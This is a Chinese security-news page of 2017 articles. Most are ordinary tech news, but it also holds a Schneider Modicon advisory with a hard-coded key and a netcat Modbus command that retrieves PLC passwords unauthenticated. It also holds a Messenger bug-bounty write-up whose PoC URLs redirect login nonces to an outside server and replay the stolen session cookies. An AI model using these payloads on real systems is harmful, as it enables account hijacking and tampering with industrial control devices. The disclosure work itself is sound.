E安全4月5日讯 人们一般会认为关键基础设施厂商会十分注意安全,就算不是真的在乎,那也会假装很在意。目前,工控行业的安全漏洞引发多方关注,法国施耐德电气(Schneider Electric)过去就曾被披露存在安全漏洞,并且被提醒:电气开发人员切勿使用硬编码密码!

尽管如此,施耐德电气仍在重蹈覆辙。这次,施耐德莫迪康(Schneider Modicon)TM221CE16R 固件1.3.3.3就出了纰漏。若不借助新的固件,用户根本没办法解决这一问题,因为他们使用的是硬编码密码,因此无法修改密码。

上周星期五下午,某人用固定密钥“SoMachineBasicSoMachineBasicSoMa”加密了用户/密码XML文件。这就意味着,攻击者可以打开控制环境(SoMachine Basic 1.4 SP1),获取并解密用户文件,并接管文件。

德国开源信息安全(Open Source Security)的Simon Heming、Maik Brüggemann、Hendrik Schwartke和Ralf Spenneberg发现了该漏洞。他们之所以选择公开,是因为他们联系了该公司,但未得到任何回复。这种最终被公开的漏洞很多都是因为厂商接到了漏洞报告,但不重视。

施耐德“不听劝”、不重视,固件安全问题堪忧-E安全

研究人员发现TM221CE16R固件1.3.3.3硬件上存在漏洞,设备为了保护应用程序的密码可被远程找回,而无需身份验证。

用户只需要使用TCP 端口502通过Modbus发送以下命令:

echo -n -e ‘\x00\x01\x00\x00\x00\x05\x01\x5a\x00\x03\x00’ | nc IP 502

研究人员写到,之后可以将找回的密码输入SoMachine Basic进行下载、修改并再次上传所需的应用程序。

在关键基础设施中,美国计算机应急响应小组(ICS-CERT)将施耐德莫迪康套件归为“关键制造、食品和农业、供水与废水系统”类 。对于这类食品、能源型关键基础设施的固件,密码保护应当更加谨慎。

E安全注:本文系E安全独家编译报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱eapp@easyaq.com0day

日本4500家实体店使用比特币作为结算方式

曾经主要作为投资产品的比特币,如今越来越多日本实体店将其作为一种结算手段使用,这将促进这种虚拟货币在日本的普及。目前,日本国内支持比特币结算的店铺约有4500家。据《日本经济新闻》5日报道,大型电器零售连锁bic camera和日本最大比特币交易所bitFlyer合作,将从7日起在bic camera位于东京的有乐町旗舰店以及bicqlo bic camera(bic camera和优衣库共同运营的商业设施,简称bicqlo)新宿东口店试运行比特币结算系统。

结算上限暂定为相当于10万日元(1美元约合110.6日元)的额度,与现金支付享受同样比例的购物折扣。

日本4500家实体店使用比特币作为结算方式-E安全

Recruit集团旗下公司Recruit-lifestyle的目标则是到今年夏天,旗下26万家店铺能使用比特币结算。消费者结算时,向店铺的收银软件输入日元金额,消费金额就会被换算成比特币并显示一个二维码,消费者用手机扫码后,消费额就会从其比特币账户扣除,与店铺合作的比特币交易所再把比特币兑换成日元汇到店铺账上。

据《日本经济新闻》报道,因比特币价格波动较大,此前大部分的买卖都以投资为目的。但由于比特币在世界各地使用时都可以直接从消费者本人账户扣除,而无需兑换成当地货币,所以近几年去国外旅游时使用比特币结算的消费者逐渐增多。此外,从今年7月起,在日本购买虚拟货币时不再缴纳消费税,也被视作比特币市场扩大的助推剂。但也有人认为,比特币价格波动剧烈,许多人持有比特币的目的是进行投机,所以难以作为结算手段推广。

日本从4月1日开始实施新修订的《资金结算法》,引进登记制度对从事比特币等虚拟货币交易的交易所进行管理,虚拟货币安全方面的相关制度建设不断推进。0day

GitHub赢了:微软宣布 12 月 15 日将关闭开源软件托管平台 CodePlex

网易科技讯 4 月 1 日消息,据 Venturebeat 报道微软近日宣布,将关闭开源软件托管平台 CodePlex。微软 2006 年推出这项服务,并决定在今年 12 月 15 日将其关闭。

微软公司副总裁布莱恩·哈里(Brian Harry)在博文中写道,人们将可以下载他们的数据档案,微软正与面向开源及私有软件项目的托管平台 GitHub 合作,给用户提供“简化的进口体验”,代码和相关内容都将转移到 GitHub 上。简单来说,GitHub 赢了!

images040301

哈里写道:“过去多年中,我们已经看到许多惊人的选项起起落落。但是现在,GitHub 正成为开源共享和大多数开源项目托管事实上的中心。”过去几年里,微软越来越向 GitHub 倾斜。它已经于 2016 年将 CNTK 深度学习工具包从 CodePlex 转移到 GitHub 上。今天,微软的 GitHub 组织已经有 16000 多名开源贡献者。2016 年,GitHub 本身也为微软适应 GitHub 做出很多努力。

与此同时,CodePlex 则不断没落。在今年 2 月份,人们在这个平台上托管的开源项目还不到 350 个。GitHub 是基于 Git 的开源版本控制软件,可以被多人用于追踪变化。人们可以移动代码到 Atlassian  的 Bitbucket 和微软 Visual Studio Team Services 等替代系统上。初创企业 GitLab 也为开源和私有项目提供托管服务。

2016 年,谷歌已经关闭了自己的托管服务 Google Code。哈里写道:“我们很荣幸能与 GitHub 密切合作,共同促进开源项目。”开源软件并非微软文化中的真正核心,但这种情况过去几年有所改变。该公司于 2015 年推出了开源项目 .NET 和 Visual Studio Code 开源文字编辑器,2016 年 8 月份推出 PowerShell。

哈里写道,人们可能无法在 CodePlex 上继续创造新的项目。该网站将在 10 月份变为只读,并在 12 月份关闭。届时,人们依然可以浏览上面的代码。

稿源:网易科技,封面源自网络0day

日本计划研发独立的卫星通信技术以防黑客攻击

据外媒 3 日报道,日本政府计划与民间企业一同研发卫星通信防御系统,通过数据的动态加密来保护卫星和地面站点之间的信息传输,使卫星免遭黑客网络攻击。项目能否获得通过将在今年夏天得到最终确认,并纳入 2018 年财政预算当中。

据悉,这一雄心勃勃的研发项目将由国家信息通信技术研究所负责,隶属于政府、行业和学术机构。日本政府计划用 5 – 10 年时间进行开发。

政府方面称,卫星使用无线电波与地面基站进行通信,若被黑客拦截将导致不可预测的后果。通过解码加密数据,黑客便可窃取信息、操纵或控制卫星。日本将研发独立的卫星通信技术以确保人造卫星的安全。

原作者:Pierluigi Paganini, 译者:狐狸酱

本文由 HackerNews.cc 翻译整理,封面来源于网络。转载请注明“转自 HackerNews.cc ” 并附上原文链接。0day

易出错、不安全,却不可避免 这就是现在的面部识别技术

想预见未来?不如想象一下装载了所有人面孔的数据库吧!

面部识别技术代表了警方和政府重要的不可避免的识别方法。不幸的是,这东西基本上没有监管,容易出错,且不安全。

上个月美国国会众议院监督及政府改革委员会举行的一场听证会上,议长杰森·查菲茨承认了面部识别技术的潜在价值,但也表达了对其使用方式的担忧。

查菲茨称,该技术十分容易出错,FBI面部识别搜索中1/7的结果都是错误的,尽管正确的匹配图像就在数据库中,还是把无辜的人给推出来了。政府保护该数据的能力也值得怀疑。

“我不相信他们能保证这些信息的安全。”

问题焦点在于:美国公民能否避免受制于公共面部识别扫描,以及哪些法律来监管这种系统。

往数据库中填进所有人的面部信息真的是正确的公共政策吗?或者说,只装载“有资格”被随时拉出来扫一遍的那些人的?

该听证会紧跟在政府问责办公室(GAO)2016年5月报告之后举行。报告题为《面部识别技术》,副标题“FBI应更好地确保隐私和准确度”。

GAO审查了FBI的下一代身份识别——州际照片系统(NGI-IPS),发现该机构没有公布隐私风险数据,没能完善地估算该技术的错误率,也没有评估外部合作者操作该系统的准确度,比如州属或其他联邦机构。

立法委员也再次审阅了乔治敦大学法学院隐私与技术中心去年发布的一份报告。该报告指出,1.25亿美国成年人的面部信息被存储在罪犯面部识别数据库中,但其中大多数人都是从未犯罪的守法公民。

电子前沿基金会(EFF)高级律师珍妮弗·林奇在其证词中说道:“不准确的系统会栽赃根本没有犯罪的无辜人,将自证清白的责任转嫁到这些人身上。而由于面部识别数据库中不成比例的表征,这些被误伤的人更有可能是少数族裔。”

林奇敦促委员会立法,要求访问非罪犯面部识别数据库和使用实时面部识别追踪时需有批文。

立法计划已在进行中。听证会前不久,吉姆·乔丹(俄亥俄共和党)称他正与包括泰德·刘(加州民主党)在内的立法者合作,起草限制面部识别使用方法的法律框架。

在事先准备好的发言中,乔治敦大学法学院隐私与技术中心执行董事阿尔瓦罗·贝多亚称,芝加哥、达拉斯、洛杉矶、纽约和西弗吉尼亚的司法部门,要么已经引入了实时面部识别系统,公布了使用该技术的计划;要么正积极探索此道。西雅图一家机构已将之成体系运作了,但并不用于实时身份识别。

在听证会上答疑的时候,贝多亚补充道,约1/4的警用随身摄像头厂商准备在设备中实现面部识别支持。

贝多亚的发言以乐观的态度结尾。

我们不用在安全和隐私之间抉择。美国人民值得享有二者。

据悉,中国的天坛公园部署了面部扫描系统来限制厕纸的过度使用。0day

FSF 活动人士呼吁就 DRM 致电 WWW 之父

W3C 正准备接纳加密媒体扩展(EME)为 Web 标准。EME 由 Google、Microsoft 和 Netflix 等公司的工程师开发,旨在让浏览器无需插件播放 DRM 保护的多媒体内容。WWW 之父蒂姆 · 伯纳斯 – 李(Tim Berners-Lee)已经公开表态支持 EME 标准,但自由软件基金会的活动人士不想现在就放弃。

他们呼吁支持者在 4 月 13 日前打电话给伯纳斯 – 李爵士,因为当天他将决定批准或反对 EME 作为 Web 标准。

伯纳斯 – 李此前已经做过解释,即使他反对实际上也无济于事,因为内容提供商为了控制内容发行,必定要采用一种 DRM 方案,不是 Web 就是原生。

0day

Android超过Windows成为网络第一操作系统

对于移动平台来讲,昨天也许是一个里程碑式的日子。据来自分析公司Statcounter的研究发现,从网络使用上看,安卓(Android)首次超过Windows成为第一大操作系统。在2017年3月期间,从Statcounter的网络活跃度看,谷歌的安卓系统占比37.93%,超过了微软的Windows系统的37.91%。

虽然数字差距微乎其微,但这已经足够说明问题,尤其是从历年来的趋势上看。见下图。

Statcounter的发现是基于其从250万个网页获得的数据,并声称为此生成了超过每月150亿次页面浏览量,以此跟踪了两个操作系统随时间的推移逐渐趋同的趋势。

有趣的是,对于苹果,其移动iOS系统很早就已经超过macOS系统,在今年三月,iOS的活动量接近于macOS的三倍。0day

Windows时间服务出现故障,向用户发送错误的时间

看来微软遭遇了一个巨大的技术问题,导致其Windows Time Service(Windows时间服务)向世界各地的众多用户和数据中心发出错误的时间,在某些情况下比实际时间差了将近1个小时。虽然微软似乎在一定程度上保持对这种情况的控制,但其服务器仍然未完全同步。 Windows机器和Internet Information Services(互联网信息服务)服务器最有可能受到错误的影响。

几个小时前,Reddit和Twitter上的众多用户首次发现这个问题,但目前这个问题仍然存在。目前还不清楚导致该问题的原因,但有些用户推测,Windows时间服务服务器可能丢失了与外部同步源的连接,从而导致这个问题出现。

此问题的解决办法之一是用户切换到另一种网络时间协议(NTP),直到微软完全解决问题。NIST,NTP和Google均提供自己的时间服务,但在切换之前,请确保它们与您的系统兼容。根据网络时间协议,发出错误的时间可能会导致一系列问题,用户所有的系统事件不仅具有错误的时间戳,而且许多安全机制取决时钟的准确性。

许多网络安全机制依赖时间作为其运作的一部分。如果攻击者可以欺骗时间,他们可能会绕过或中和其它安全元素。例如,不正确的时间可能会中断受影响系统上的日志文件条目与其他系统上的事件协调能力。保护计算机和网络免受此类安全威胁的最佳方法是保持它们与NTP服务的实时更新。

0day

看我如何窃取Messenger.com用户登录认证随机数并获得15000美元漏洞赏金

hackingnv.jpg

www.messenger.com是Facebook旗下即时通讯软件Messenger官网,该网站中添加了基于随机数认证( nonce based login )的Facebook登录服务,如果用户当前是Facebook登录状态,则可以直接以Facebook身份登录messenger.com。然而,由于随机数为用户生成了访问messenger.com的会话cookie,这种机制可能会让当前已登入的Facebook用户构造恶意随机数(nonce)和URL,使访问发生跳转。另外,在此过程中,由于当前的facebook.com和messenger.com会话cookie会发生交互,这也让用户的Facebook账户陷入被劫持风险。下面我们就一起来研究研究:

Messenger.com网站中添加的Facebook的登录机制

当用户访问messenger.com时,网站会发起Facebook端的请求https://www.facebook.com/login/messenger_dot_com_iframe/请求通过以下框架自动加载:

https://www.facebook.com/login/messenger_dot_com_iframe/?redirect_uri=https%3A%2F%2Fwww.messenger.com%2Flogin%2Ffb_iframe_target%2F%3Finitial_request_id%3DA8eKoiVaTWx41Azk8IEwhvY&identifier=ab66de64be75eef525f18b812e07b5d1&initial_request_id=A8eKoiVaTWx41Azk8IEwhvY

其中,identifier和initial_request_id是messenger.com分配的两个参数,并与此过程中产生的datr用户cookie值相关。

如果用户当前是Facebook登录状态,请求将结合用户安全随机数(secret nonce)转向https://www.messenger.com/login/fb_iframe_target/,具体请求状态如下:

https://www.messenger.com/login/fb_iframe_target/?userid=100011424732901&name=Tom+Jones&secret=hFTzdP2Q&persistent=1&initial_request_id=A8eKoiVaTWx41Azk8IEwhvY

此时,登录框架将会显示以用户Facebook账户为凭据的登录按钮:

mess3.png

如果用户点击该按钮确认继续,则会向https://www.messenger.com/login/nonce/发起以下包含随机数的一个POST请求:

POST /login/nonce/ HTTP/1.1
Host: www.messenger.com
Connection: close
Content-Length: 109
Cache-Control: max-age=0
Origin: https://www.messenger.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/1.0 (Macintosh; Intel Mac OS X 1_0_0) AppleWebKit/1.0 (KHTML, like Gecko) Chrome/1.0.0.0 Safari/1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.messenger.com/
Accept-Language: en-US,en;q=0.8
Cookie: datr=3GSyWAIGB6DhdUIQebUwj9Jg
userid=100011424732901&nonce=hFTzdP2Q&persistent=true&initial_request_id=A8eKoiVaTWx41Azk8IEwhvY&lsd=AVr7DyPv

以上请求中同样包含了参数identifier和initial_request_id,以及cookie值datr。之后,请求服务使用用户安全随机数生成了一个session会话值和一组Set-Cookie值:

HTTP/1.1 302 Found
Location: https://www.messenger.com/
...
Set-Cookie: sb=3dpaV2P6giuULzTDhNABjeti; expires=Tue, 26-Feb-2019 06:43:29 GMT; Max-Age=63071999; path=/; domain=.messenger.com; secure; httponly
Set-Cookie: c_user=100011424732901; expires=Sat, 27-May-2017 06:43:29 GMT; Max-Age=7775999; path=/; domain=.messenger.com; secure
Set-Cookie: xs=22%3AeAAc-sXWUZCaFw%3A2%3A1488091409%3A-1; expires=Sat, 27-May-2017 06:43:29 GMT; Max-Age=7775999; path=/; domain=.messenger.com; secure; httponly
Set-Cookie: csm=2; expires=Sat, 27-May-2017 06:43:29 GMT; Max-Age=7775999; path=/; domain=.messenger.com
Set-Cookie: lu=gQQAh17N-bnCQJL3wuArjLLQ; expires=Tue, 26-Feb-2019 06:43:29 GMT; Max-Age=63071999; path=/; domain=.messenger.com; secure; httponly
...

研究如何窃取用户安全随机数

初步分析

在此类基于随机数认证登录的情况中,一般会存在一个参数使用户从当前网站重定向到另一个已添加登录应用的网站,所以,我首先从这里入手检查它的安全严谨性。在网站Messenger的Facebook登录链接https://www.messenger.com/login/fb_iframe_target/中,包含了一个控制随机数并进行URL重定向的参数redirect_uri,使用户完成从Messenger到Facebook跳转,在此过程中,其重定向区域(/login/fb_iframe_target/)不允许更改或添加任何字符串请求,但是,经测试发现,可以在登录链接中添加一个hash(#)号,并且使用messenger.com的子域名进行请求也能完成到Facebook的重定向。如:

https://subdomain.messenger.com/login/fb_iframe_target/#

URL Hash:hash即#号,URL中#之后的内容叫做片段(Fragment),主要可用于链接到所加载页面中的指定锚点位置,片段Fragments不会出现在HTTP请求消息中,因为,Fragment Identifier片段标识符仅被浏览器使用。如http://www.example.com/index.html#location中,浏览器只会对/index.html发出请求。

Hash bang(#!):针对http://www.example.com/#sth类似链接,早期来说,搜索引擎的网络爬虫只会抓取http://www.example.com/里面的内容,后期,为了解决这个问题,google提出解决方案:hash bang,即将#改成#!即可让爬虫抓取到一些动态AJax内容,http://www.example.com/#sth的内容。现在,包括Facebook、Twitter在内的很多主流网站都支持hash bang(#!)

通常,当认证随机数以字符串方式https://example.com/login/?secrect=nonce,而不是#片段方式https://example.com/login/#secrect=nonce,发起重定向URL时,可以在浏览器请求中抓取到前述相应的nonce和Set-cookie值。由于Messenger.com网站支持#!方式,当在涉及Messenger.com的URL链接中加入#!方式的内容之后,链接发生请求时,#!后的内容亦会被加载。另外,由于请求端https://www.facebook.com/login/messenger_dot_com_iframe/也支持#方式访问,所以,在链接https://www.messenger.com/login/fb_iframe_target/中加入#!方式内容后,请求发生时,可能会加载相应内容。

漏洞构思

为了窃取登录认证随机数必须进行异站重定向(redirect offsite)或站外跳转。由于网站Messenger.com中可以使用类似l.php进行链接重定向,如:

https://l.messenger.com/l.php?u=https%3A%2F%2Fl.messenger.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.freebuf.com

而通常在该动作之前,一般会使用javascript删除HTTP请求中的referer头,使跳转后的目标地址不会收到referer请求。而且,从Messenger跳转到Facebook的过程中使用了302重定向。

302重定向:(302 redirect)指的是当浏览器要求一个网页的时候,主机所返回的状态码。302状态码的意义是暂时转向到另外一个网址,但搜索引擎中保存原来的URL。

另外,我从谷歌搜索到了这个Facebook链接:https://www.facebook.com/dialog/share_open_graph,只要给定一个Facebook ID和重定向URL,该网页应用服务就能自动发生跳转,因此,通过该链接构造的Facebook应用可以让请求服务端发生任意URL的重定向跳转。

综合以上问题,可以构造出以下包含重定向URL-https://stephensclafani.com/poc.php的验证性(PoC)链接:

https://www.facebook.com/login/messenger_dot_com_iframe/?redirect_uri=https%3A%2F%2Fwww.messenger.com%2Flogin%2Ffb_iframe_target%2F%3Finitial_request_id%3DA8eKoiVaTWx41Azk8IEwhvY%23!%2Fl.php%3Fu%3Dhttps%253A%252F%252Fwww.facebook.com%252Fdialog%252Fshare_open_graph%253Fapp_id%253D758283087524346%2526redirect_uri%253Dhttps%253A%252F%252Fstephensclafani.com%252Fpoc.php&identifier=ab66de64be75eef525f18b812e07b5d1&initial_request_id=A8eKoiVaTWx41Azk8IEwhvY

但是,遗憾的是,以上重定向没有成功,我收到的referer头还是https://www.messenger.com/l.php。这是因为每一个www.messenger.com页面都包含以下origin-when-cross-origin策略

<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />

该策略在发起跨域请求时,为了保证用户数据(如nonce)不被泄露,referrer只包含域名,不包含具体路径,因此这种设置方式显然无效。

剩下的就只能寄希望于messenger.com的子域名了,意外的是,我通过crt.sh发现其中一个子域名fb.beta.messenger.com未使用origin-when-cross-origin策略,最终,通过该子域名成功构造了如下的PoC链接,并达到了预期效果:

https://www.facebook.com/login/messenger_dot_com_iframe/?redirect_uri=https%3A%2F%2Ffb.beta.messenger.com%2Flogin%2Ffb_iframe_target%2F%3Finitial_request_id%3DA8eKoiVaTWx41Azk8IEwhvY%23!%2Fl.php%3Fu%3Dhttps%253A%252F%252Fwww.facebook.com%252Fdialog%252Fshare_open_graph%253Fapp_id%253D758283087524346%2526redirect_uri%253Dhttps%253A%252F%252Fstephensclafani.com%252Fpoc.php&identifier=ab66de64be75eef525f18b812e07b5d1&initial_request_id=A8eKoiVaTWx41Azk8IEwhvY

漏洞利用分析

如果当前用户是Facebook登录状态:

1 链接https://www.facebook.com/login/messenger_dot_com_iframe/将会跳转到到https://fb.beta.messenger.com/login/fb_iframe_target/,并在此过程中为用户生成一个认证随机数nonce:

https://fb.beta.messenger.com/login/fb_iframe_target/?userid=100011424732901&name=Tom+Jones&secret=tBTyFt4m&persistent=1&initial_request_id=A8eKoiVaTWx41Azk8IEwhvY#!/l.php?u=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Fshare_open_graph%3Fapp_id%3D758283087524346%26redirect_uri%3Dhttps%3A%2F%2Fstephensclafani.com%2Fpoc.php

由于fb.beta.messenger.com未使用origin-when-cross-origin策略,所以此页面中构造的URL将会发生跳转。

2 由于在其中添加了#!/l.php,最终在用户端浏览器中重定向到了链接https://fb.beta.messenger.com/l.php具体请求如下:

https://fb.beta.messenger.com/l.php?u=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Fshare_open_graph%3Fapp_id%3D758283087524346%26redirect_uri%3Dhttps%3A%2F%2Fstephensclafani.com%2Fpoc.php

由于发生了302跳转,用户浏览器重定向到https://www.facebook.com/dialog/share_open_graph?app_id=758283087524346&redirect_uri=https://stephensclafani.com/poc.php,所以浏览器仍然保存的是包含了nonce的referer头。

3 由于在链接后https://www.facebook.com/dialog/share_open_graph添加了重定向参数redirect_uri,且给定值为https://stephensclafani.com/poc.php,所以用户浏览器最终发生了向https://stephensclafani.com/poc.php的跳转。

4 通过PoC脚本poc.php,可以提取重定向请求过程referrer中的nonce,并能把该nonce值应用于https://www.messenger.com/login/nonce/的POST请求中,由此生成session会话值和以下cookie信息:

Array
(
    [sb] => wP-xHWyEaAT1JN33JoTCWmOn
    [c_user] => 100011424732901
    [xs] => 22:J2NF2Ovl7qzACT:2:1488094195:-1
    [csm] => 2
    [lu] => gXtqnpAk_31Gy18Nf3BjanRw
)

当然,利用该cookie可以自由地进入用户的Messenger和Facebook账户:

GET / HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/1.0 (Macintosh; Intel Mac OS X 1_0_0) AppleWebKit/1.0 (KHTML, like Gecko) Chrome/1.0.0.0 Safari/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Upgrade-Insecure-Requests: 1
Cookie: sb=wP-xHWyEaAT1JN33JoTCWmOn; c_user=100011424732901; xs=22:J2NF2Ovl7qzACT:2:1488094195:-1; csm=2; lu=gXtqnpAk_31Gy18Nf3BjanRw
Connection: close
GET / HTTP/1.1
Host: www.messenger.com
User-Agent: Mozilla/1.0 (Macintosh; Intel Mac OS X 1_0_0) AppleWebKit/1.0 (KHTML, like Gecko) Chrome/1.0.0.0 Safari/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Upgrade-Insecure-Requests: 1
Cookie: sb=wP-xHWyEaAT1JN33JoTCWmOn; c_user=100011424732901; xs=22:J2NF2Ovl7qzACT:2:1488094195:-1; csm=2; lu=gXtqnpAk_31Gy18Nf3BjanRw
Connection: close

说明:由于POST请求https://www.messenger.com/login/nonce/中由cookie datr生成的参数initial_request_id和identifier,不存在请求失效和过期情况,所以可应用于对多个nonce的session会话值创建。另外,针对登录了网站messenger.com的用户,该攻击同样有效。

修复措施

Facebook首先的修复措施是在重定向URL中阻断了#符号的加入,但是,这种方式可以通过以下链接被绕过:

https://www.facebook.com/login/messenger_dot_com_iframe/?redirect_uri=https%3A%2F%2Ffb.beta.messenger.com%2Flogin%2Ffb_iframe_target%2F%3Finitial_request_id%3DA8eKoiVaTWx41Azk8IEwhvY&identifier=ab66de64be75eef525f18b812e07b5d1&initial_request_id=A8eKoiVaTWx41Azk8IEwhvY#!/l.php?u=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Fshare_open_graph%3Fapp_id%3D758283087524346%26redirect_uri%3Dhttps%3A%2F%2Fstephensclafani.com%2Fpoc.php

该链接中添加了#!/l.php之后,即使是跨站跳转,浏览器也会通过302重定向保留URL中的hash(#)。添加到链接https://www.facebook.com/login/messenger_dot_com_iframe/中的#在发生重定向之后,会被添加到链接https://fb.beta.messenger.com/login/fb_iframe_target/中。

通常,为了防止这种情况,网站可以设置自己的重定向hash(#),如:

mess5.png

漏洞报送进程

我是2月26号星期天向Facebook安全报送了这个漏洞的,星期一大早,Facebook在确认了这个漏洞之后的两小时就开始进行修复,之后Facebook向我奖励了15000美元的漏洞赏金。

2017.2.26   5:12 AM     向Facebook报告漏洞;

2017.2.27   8:01 AM     Facebook确认漏洞;

2017.2.27   9:35 AM     Facebook开始进行临时性修复;

2017.2.27   10:09 AM   我告知Facebook当前修复可以被绕过;

2017.2.27   11:56 AM   Facebook向我反馈,他们已经在制订修复方案;

2017.2.27   4:29 PM     Facebook修复了漏洞;

2017.2.27   9:39 PM     我对Facebook的修复再次作了验证;

2017.3.3     4:36 PM     Facebook向我奖励了 $15,000美元漏洞赏金。

*参考来源:stephensclafani,FreeBuf小编clouds编译,转载请注明来自Freebuf.com。0day

企业安全运维离不开威胁模式验证

E安全4月4日文 在探寻威胁模式的生命之旅中,人们正处于测试阶段。从分析需求、资产和威胁,到设计通用的可重用威胁模式,并在安全监控平台实现这种模式,人难免会犯错。

19世纪英国著名艺术家约翰·罗斯金曾说, “品质从来靠的就不是偶然机遇,唯有勤奋才能打造卓越品质”(Quality is never an accident,it is always the result of intelligent effort)。

因此,结构良好的精确测试过程对验证模式是否正确实现并确保有效解决攻击场景至关重要。

即使处于测试阶段,软件开发生命周期(Software Development Life Cycle,SDLC)的典型流程也能引领正确的方向。

软件测试方法同样适用于威胁模型

以上这种验证攻击模式一旦实现,通常用于软件测试的黑盒测试及白盒测试两种互补的方法将如何应用到新实现的威胁模型之中?

白盒测试旨在验证威胁模式的逻辑,并确保实现(Implementation)与要求相符。如果正确进入设计阶段,构成该模式的不同组件应已被明确定义和记录。无论处于哪个阶段,都需要准备具体的输入和预期输出列表,以触发实现的各个部分。与任何软件一样,测试进度可以通过测试覆盖的代码百分比来量化,但这个过程可能会比较耗时。

在安全运维中心(SOC),时间就是宝贵的资源,因此自动化是关键。所幸的是,在这个阶段,我们应该能拥有大量的历史数据,因为信息已经开始流入系统。因此,选择精确的样本至关重要,因为必须要具有良好的水平覆盖范围(例如测试组件的数量)和垂直覆盖范围(例如输入的种类)。可以借助测试组件映射每个选定的样本使逻辑验证和威胁模式逻辑有效。此外,为了确保输出仍与要求一致,变化之后,可以将相同的样本重新注入平台。

相反,黑盒测试检验的是威胁模式的功能,而无需仔细检查逻辑。

在这个阶段,建议从攻击场景(最初在分析阶段详细阐述的)开始,并确定攻击者可能会利用的方法。许多组织机构发现建立或参与到“红队”中(扮演攻击者的角色)是有益的,蓝队通过确保实现的威胁模式防御,并按预期行事。演习最后,两队会面审查结果,并罗列所有当前未被实现和需进一步审查的威胁模式而检测的所有情形。

企业有效运维离不开威胁模式验证-E安全.jpg

安全运维中心除了惧怕攻击者,还应减少信噪比

留下的疑问就是,如何根据测试结果衡量模式的有效性。最简单的方式是评估误报和漏报率。这两个参数便于理解威胁模式基于漏报率的有效性,以及该模式能根据误报率产生的潜在“噪声”。

每个安全运维中心目前为止应该学到了一个非常重要的教训:最危险的敌人可能不是隐蔽的攻击者,而是误报量淹没了分析师,阻止其响应事关重大的安全问题。在保护组织机构之前必须减少信噪比。

此流程结束时,企业必须着手从根本上分析识别到的每个问题,但要注意简单对实现进行更改,要是最终迷途未返,那就太可惜了。

接触代码之前,企业应从需求分析结果入手思考:是否完全错过了攻击场景?是不是存在没有考虑到的数据源?是不是实现过程出了差错?借助简单的清单进入该阶段能够减少或者杜绝对其它威胁模式造成负面影响。

但需要注意的是,要意识到所做的工作可能会在短时间内过时,也就是说,可能会出现新的测试威胁模式和攻击场景,当然,企业对策也在不断变化。

E安全注:本文系E安全独家编译报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱eapp@easyaq.com0day

90后小伙为讨女友欢心 入侵化妆品APP篡改商品售价

90后小伙为讨女友欢心 入侵化妆品APP篡改商品售价-E安全

90后小伙张帆为了讨好女友,恶意侵入某化妆品公司销售App后台,篡改数据后以几分钱的价格骗购单价数百甚至上千元的化妆品,请各地网友代收后转寄给他,再由他交予女友在微店上销售。张帆在短短20天内作案41次,仅花了几元钱骗购了价值7万多元的化妆品。3月31日,上海市静安区人民检察院以诈骗罪对张帆提起公诉。

初中毕业生成游戏安全员

尽管只有初中毕业,92年出生的张帆对计算机却始终保持着浓厚的兴趣,尤其喜欢打游戏,对各类游戏及后台的各种数据非常敏感。他自述,两年前自己孤身一人到北京当起北漂,凭借在网络游戏方面的特长,成功获得一家知名移动社交App公司的青睐,做起了游戏安全员的工作,主要审查公司手机App上的游戏是否存在外挂现象,月薪1.2万元,并让同样爱好网游的晓青对其产生崇拜与爱慕。确立了恋爱关系,晓青于2016年6月搬来与张帆同住。

22岁的晓青没有工作,从2016年6月开始做某知名化妆品的代理,并通过微店进行销售。通常她会在该化妆品的网上商城下单,用9.25折把商品买下来,然后以正常价格在微店进行销售,作为代理她还能根据销售额,每月从该化妆品公司拿到18%-24%不等的返点。

多次侵入后台低价购买化妆品

见女友工作辛苦,张帆开始想是否可以利用自己的“专长”帮女友低价进货。2016年8月4日,张帆抱着试试看的心态侵入了该化妆品公司的销售App后台,果然发现了漏洞。他随手杜撰了一个用户名,用他的平板电脑在该化妆品公司的App上登录并下单购买保湿水、眼霜、面霜、精华液、卸妆乳、洁面乳等,待数据发送后,他立马在他的台式电脑上,用平时工作中常用的截取数据软件,拦截数据包,将其中一串数字中的0改为1,然后他发现App上显示的商品单价从几百元甚至上千元自动变成了几分钱,这一次总价定格在0.26元。

为了不让人发现,他以200元的价格从网上购买了一个支付宝账号,用该账户付了款,同时,他又联系了平时一起打游戏的外地网友,让他帮忙代收货。

因为用户名、付款账户是杜撰的,收货人和地址也无法直接查到他本人,张帆发现商家根本没有发现价格上的猫腻。没过几天他又申请了新的账号故伎重施。事后,经公安查证,在短短20天内,他先后41次用四个不同的账户下单,每次以同样的手法将化妆品的单价改成0.02-0.09元不等,前前后后总计购买了价值7万多元人民币的化妆品,并先后用各种借口请全国各地多位网友代为收货。而这些网友收到货后直接转寄到张帆的住处,网友垫付的邮费他则用自己的支付宝账户转账给对方的。货到手后,张帆将货物交给女友让其放在她的微店销售。

此外,张帆在9月初还用同样的手法下了25笔订单,并完成了低价交易,但商家尚未发货,这些订单实际价值总计人民币2.6万余元。

财务核帐显端倪

该化妆品公司经营地在上海静安。2016年9月初,该公司财务在核对账单时突然发现,8月份的网上销售订单有几笔存在异常,每样产品均以几分钱的单价成交,而事实上,网上商品没有一件是低于80元的。该公司就在内部先进行了排查,没有发现员工内部账户进行登录并修改的情形。更改网上价格,只有老板的秘书或理有权限,而这些人都否认改过。公司借助服务器租赁商的工具查找到有人在他们数据库做了数据注入,最终导致订单金额变更,经济损失高达约7万元人民币。

该公司向静安区公安局报了案,经过侦查人员的摸排走访,最终抓获千里之外的张帆。张帆还自述,以前出于好奇和贪玩,曾侵入过一些App的后台,发现过一些公司的软件漏洞,那时他会主动联系对方,帮着一起修复漏洞,有些大公司甚至还给他寄过动漫手办作为答谢。

[检察官说法]

